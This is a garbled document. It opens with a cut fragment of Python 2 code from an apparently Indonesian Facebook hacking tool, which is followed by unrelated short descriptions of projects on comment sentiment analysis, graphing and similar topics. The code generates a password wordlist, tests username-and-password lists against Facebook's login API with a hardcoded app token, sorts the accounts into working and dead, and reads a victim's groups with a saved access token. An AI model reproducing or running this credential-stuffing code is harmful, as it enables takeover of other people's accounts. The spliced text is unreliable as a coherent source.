file.write('%s%s\n%s%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s' % (a, c, a, b, b, a, b, c, c, a, c, b, a, a, b, b, c, c, a, d, b, d, c, d, d, d, d, a, d, b, d, c, a, e, a, f, a, g, a, h, b, e, b, f, b, g, b, h, c, e, c, f, c, g, c, h, d, e, d, f, d, g, d, h, e, a, f, a, g, a, h, a, e, b, f, b, g, b, h, b, e, c, f, c, g, c, h, c, e, d, f, d, g, d, h, d, d, d, a, f, g, a, g, h, f, g, f, h, f, f, g, f, g, h, g, g, h, f, h, g, h, h, h, g, f, a, g, h, b, f, g, b, g, h, c, f, g, c, g, h, d, f, g, d, g, h, a, i, a, j, a, k, i, e, i, j, i, k, b, i, b, j, b, k, c, i, c, j, c, k, e, k, j, a, j, b, j, c, j, d, j, j, k, a, k, b, k, c, k, d, k, k, i, l, i, m, i, n, j, l, j, m, j, n, j, k)) wg = 0 while wg < 100: wg = wg + 1 file.write(a + str(wg) + '\n') en = 0 while en < 100: en = en + 1 file.write(i + str(en) + '\n') word = 0 while word < 100: word = word + 1 file.write(d + str(word) + '\n') gen = 0 while gen < 100: gen = gen + 1 file.write(j + str(gen) + '\n') file.close() time.sleep(1.5) print '\n\x1b[1;91m[+] \x1b[1;97mTersimpan \x1b[1;91m: \x1b[1;97m %s.txt' % a raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') lain() except IOError as e: print '\x1b[1;91m[!] Gagal membuat file' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') lain() def check_akun(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() else: os.system('clear') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[?] \x1b[1;92mIsi File\x1b[1;91m : \x1b[1;97musername|password' print 40 * '\x1b[1;97m\xe2\x95\x90' live = [] cek = [] die = [] try: file = raw_input('\x1b[1;91m[+] \x1b[1;92mFile \x1b[1;91m:\x1b[1;97m ') list = open(file, 'r').readlines() except IOError: print '\x1b[1;91m[!] File tidak ditemukan' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') lain() pemisah = raw_input('\x1b[1;91m[+] \x1b[1;92mPemisah \x1b[1;91m:\x1b[1;97m ') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...') print 40 * '\x1b[1;97m\xe2\x95\x90' for meki in list: username, password = meki.strip().split(str(pemisah)) url = 'https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + username + '&locale=en_US&password=' + password + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6' data = requests.get(url) mpsh = json.loads(data.text) if 'access_token' in mpsh: live.append(password) print '\x1b[1;97m[\x1b[1;92mLive\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password elif 'www.facebook.com' in mpsh['error_msg']: cek.append(password) print '\x1b[1;97m[\x1b[1;93mCheck\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password else: die.append(password) print '\x1b[1;97m[\x1b[1;91mMati\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password print '\n\x1b[1;91m[+] \x1b[1;97mTotal\x1b[1;91m : \x1b[1;97mLive=\x1b[1;92m' + str(len(live)) + ' \x1b[1;97mCheck=\x1b[1;93m' + str(len(cek)) + ' \x1b[1;97mDie=\x1b[1;91m' + str(len(die)) raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') lain() def grupsaya(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() else: os.system('clear') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...') print 40 * '\x1b[1;97m\xe2\x95\x90' try: uh = requests.get('https://graph.facebook.com/me/groups?access_token=' + toket) gud = json.loads(uh.text) for p in gud['data']: nama = p['name'] id = p['id']
saurabhone
Social Media is playing an important role in marketing of a product. This social media can also be used to know the customer's opinions on improvising the product's features, it's quality and many other things. Sentimental Analysis can roughly give us an idea about the future demand of the product which can help us in increasing the revenue and cutting down on manufacturing costs. In this Jupyter Notebook, we will do the sentimental analysis on a car model and for analysis purpose we will take the comments as the data from it's Facebook post. We will use Python libraries along with Facebook Graph API to achieve our goal.
pkeorley
Visualising comments on a user's account as a graph using the unofficial TikTok API
vatsalmakodia
Developed a Sentiment Analysis Model based on Natural Language Processing that analyses the comments and returns the sentiment of the commentator. Shows the summary of the analysis in the form of count as well as a bar graph. The model also generates an output CSV stating the sentiment of each comment. Works in bulk as well as on a single line.
theyashgupta
Consider a friends‘ network on face book social web site. Model it as a graph to represent each node as a user and a link to represent the fried relationship between them. Store data such as date of birth, number of comments for each user. 1. Find who is having maximum friends 2. Find who has post maximum and minimum comments 3. Find users having birthday in this month Hint: (Use adjacency list representation and perform DFS and BFS traversals)
peter-bukowski
Graffit is a data analysis application that takes data from Reddit via API and returns graphs or raw data of particular pages. The user can paste any link from thread,subreddit or post and be able to choose from multiple graphs to recieve analysis from. Features: User can choose any link to paste into form from reddit that is in the category of thread,subreddit or post. Users can choose to include or exclude any words in their analysis. Users can receive graph analysis of a bar graph with most frequent words in a comment section or subreddit. Raw data is included as well. User can receive a network graph of all commonly associated terms of a particular Reddit page. User can receive a timeline graph of one or more words being present throughout a comment or subreddit section. Each word has its own timeline graph, and each node will have data present such as time the word has appeared and what comment or post this word has appeared. User can download their graphs and raw data as PDF. Data is porcessed through a Natural Language Processing library named "Natural".
ahmdkhan-cs
Social media like Facebook is a huge platform to get comments (Reviews) about a product or a topic which are truly based of user’s feelings (sentiments). User reviews about products are very important for companies it determines whether the product of a company is successful or a failure. In order to figure out whether the product is successful or a failure companies need to read user reviews about their product and it is impossible for human to read thousands of reviews this is where sentiment analysis of products is applicable. The application fetches the comments on a post using Facebook graph API and reads all of the reviews and based on sentiment analysis it detects those words which are used against the product or used in the favor of product like (good, bad) etc. Based on this analysis the application tells about the success rate of product, this will save a lot of time as the task of reading reviews is automated and a precise result will be obtained.
furkankarakaya
In this project, DC Motor driver application is modeled in Simulink as three different versions. By modelling DC Motor with basic components, with electrical blocks and with electromechanical blocks, it is learnt how a DC Motor block is constructed and modified for the rated operation. Then, by analyzing these three models and comparing them, the characteristics of the DC motor are studied. In order to understand DC Motor behavior, critical graphs are obtained and investigated in this project. Lastly, the obtained results are studied and commented for each model.
Sentiment Analysis is an automated mining of user generated opinionated text data such as reviews,comments and feedback.Sentiment Analysis classify those text data into their respective sentiments of positive , negative or neutral.Most of the researchers focused into this domain using one of the three classifier like SVM,Naive Bayes, and Maximum Entropy. In machine learning there are numbers of classifier model available.In this proposed approach there will be more focus on Mathematical Analysis and Natural Language Processing.The combinational difference between two subsets will provide the answer of movie review being positive or negative.In case of Natural Language Processing three algorithm has been used in this proposed model respectively Co_Occurrence matrix , Knowledge Graph Naive Bayes.To measure the combinational ratio of two subsets, Jaccard Distance has been used.Jaccard Distance is a pretty common technique in Mathematical and Big Data Analysis.In Feature Selection Jaccard Distance and Lexicon Bas
Gimbo44
A combined MPI and OpenMP implementation of 1-dimesnional finite element method This project is a continuation from the first project. The aim of the project is to implement the program from the first project into a combined MPI-OpenMP framework. This is quite a common apparoach for exploiting both coarse and fine grain parallelism in programs. A problem is partitioned coarsely at the top level and finely within each individual part. The coarse level partitioning is done using MPI and the finer level partitioning is usually done on a multi-core machine or on a Graphics Processing Unit (GPU). The aim of the project is to partition the Finite Element Program into smaller parts and distribute these parts to different computers by using MPI. The computation on each part would now occur within the individual machines using the cores available on those machines. The coding in the project will be minimal, it is the case quite often that parallelizing a piece of sequential code requires only small but well thought out modifications. The deliverables: The first deliverable is of course your modified C or FORTRAN code with appropriate MPI and OpenMP directives. You should also comment your code suitably, so that the code itself can be read and your modifications can be understood. You have to do a scalability study by using 2,4,6 and 8 machines in the IBM cluster. Each machine in the cluster has 4 cores. For each of the above number of machines, you should use 4 threads in each machine. Also you should do the above study using at least two problem sizes. The IBM machines each have 8 GB of RAM, so you should be able to allocate quite large arrays dynamically. You should plot the results in graphs and include in the report. You have to submit a document where you should explain how you have implemented the parallelism in the code and why. Include also all the decisions related to your implementation in the first project, so that the document can be read without checking your first project again. The document should also include the graphs mentioned above. The document should be strictly in pdf format. You should develop your code on the IBM cluster. Please make as much use of it as you can. However, I will make the login restricted after about ten days, so that you can conduct your final performance analysis without any interference. I will allocate slots for group members when only they can login. Of course the output from your parallelized program should match the output of the sequential program. Deadline: The submission deadline is 11:59 pm on November 4, through cssubmit. Note: The project can be done either individually or in a group consisting of a maximum of two students. Note: I will give you hints within a few days if there are requests for hints. You are also welcome to post your thoughts/designs, however, you should not post any code.
Sainava
EchoLens is a graph-based analysis tool for YouTube comment sections. It uniquely combines toxicity detection with community analysis to identify cyberbullying clusters, abusive interactions, and echo chambers. By modeling comments and users as a graph, it reveals not just toxic comments, but how they spread and cluster within communities.
spacegoats
A simple script using PRAW to scrape a reddit submission for comment scores and output the data as a graph.
antonnprince
A website that performs sentiment analysis on a youtube video's comments when a valid URL is provided as input. The output is shown as a graph and is divided into 3 parts, positive neutral and negative
HajrahSiddiqui
Hello all! This is my scientific - graphing calculator I have made - all my refrences are in the code as well as a README file. I also added additional comments in the code! Enjoy
YouTube Comment Sentiment Analyzer is a Python-based web application that analyzes the sentiment of comments from any YouTube video. It uses the YouTube Data API to fetch comments, processes them using the VaderSentiment library, and displays the result as a bar graph showing positive, negative, and neutral sentiments.
ankit8jst
YouTube Sentiment Analyzer 🎥📊 A Flask-based web app that analyzes YouTube video comments using sentiment analysis. It categorizes comments as Positive, Negative, or Neutral and visualizes results with graphs and charts. Built with Flask, YouTube API, TextBlob, Matplotlib, HTML, CSS. 🚀